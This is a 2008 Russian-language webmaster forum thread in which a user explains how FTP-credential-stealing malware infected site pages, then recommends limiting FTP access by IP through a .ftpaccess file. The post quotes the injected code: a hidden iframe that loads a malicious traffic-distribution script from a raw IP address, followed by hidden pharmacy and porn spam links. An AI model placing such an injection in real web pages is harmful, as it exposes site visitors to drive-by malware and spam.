24.08.2008, 15:26 | #11 |
Новичок
Регистрация: 24.08.2008
Адрес: Kiev
Сообщений: 60
Вес репутации: 199
|
|
24.08.2008, 17:15 | #13 |
Новичок
Регистрация: 06.11.2007
Сообщений: 18
Вес репутации: 0
|
Привет всем. Год назад я сталкнулся с проблемой вирусов на хосте, когда код вируса дописывается - вписывается после определённой фразы или в конце страницы, заражал страницы index.** main.** default.** и др. я долго с этим боролся:
1. поменял ФТП клиента, 2. написал своему хостеру о вирусах, 3. пароли везде поменял, но ничего не помогало, тогда я начал лазить по нету и искать подобные проблемы и наткнулся на решение, которое и сейчас мне помогает. Скрипт вируса: (один из типов). -------------- <!-- o65 --><iframe style=display:none src="http://88.255.90.226/~yaksite/tds/index.php?out=1191758165"></iframe><div style=display:none><a href="http://medical-maps.150m.com/index.html">medical,tramadol,viagra,clonezepam,cia lis,pills</a> <a href="http://all-porno-mapis.0catch.com/index.html">blow job,blow job free pic,all oral sex,oral super sex</a></div> <!-- c65 --> Имена заражаемых файлов: ----------------------- default .php / html index .php / html header .php /html footer .php / html login .php /html main .tpl / php / html Решение броблемы: ----------------- В сообщениях антивирусных служб появилась информация о вирусах, распространяющих себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код. В каталоге FTP-аккаунта должен находиться файл с именем .ftpaccess. Если файла нет или файл пустой (нулевой длины) или же в нем строка с точкой (она входит в любой IP-адрес) - доступ открыт для любого IP. Настройка .ftpaccess файла: - Если в файле .ftpaccess поставить цифру 1, то доступ будет открыт для всех IP, в которые входит такая цифра. - Если в этом файле вписать Ваш внешний IP-адрес, доступ будет закрыт для всех других. Это самая эффективная защита вашего сайта. - Для тех, кто пользуется конструктором для сайтов. Вам необходимо вписать в файл: .ftpaccess IP-адрес вашего сайта и IP–адрес сервера где находится конструктор (обратитесь в нашу тех. поддержку за этим IP-адресом). - Вписать нужный вам IP адрес в .ftpaccess вы можете с помощью FTP клиента или посредством Файл-менеджера в cPanel. - Если Ваш IP динамический - можно прописать часть адреса, например: 195.131.185 или вписать несколько IP-адресов. - Для того, чтобы прописать IP адрес с помощью cPanel, зайдите на вашу контрольную панель управления выберите Файл-менеджер, сделайте отметку для Home Directory и поставьые "галочку" в поле Show Hidden Files (dotfiles), кликните на кнопу “Go”. В списке файлов выберите файл .ftpaccess, кликните правой кнопкой вашей мышки на этот файл, в открывшемся контекстном меню выберите Edit File, далее редактируйте файл .ftpaccess. Спасибо за внимание. |
24.08.2008, 17:18 | #14 |
Злой модератор
Регистрация: 25.03.2007
Адрес: Deep forest
Сообщений: 5,343
Вес репутации: 508
|
|
24.08.2008, 18:16 | #15 | |
Новичок
Регистрация: 06.11.2007
Сообщений: 18
Вес репутации: 0
|
Цитата:
Почти на всех нормальных хостингах эта защита работает. |
|
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Внимание! Вирусы! | Wink | Вопросы по работе системы | 233 | 05.05.2009 10:02 |
Часовой пояс GMT +3, время: 20:29.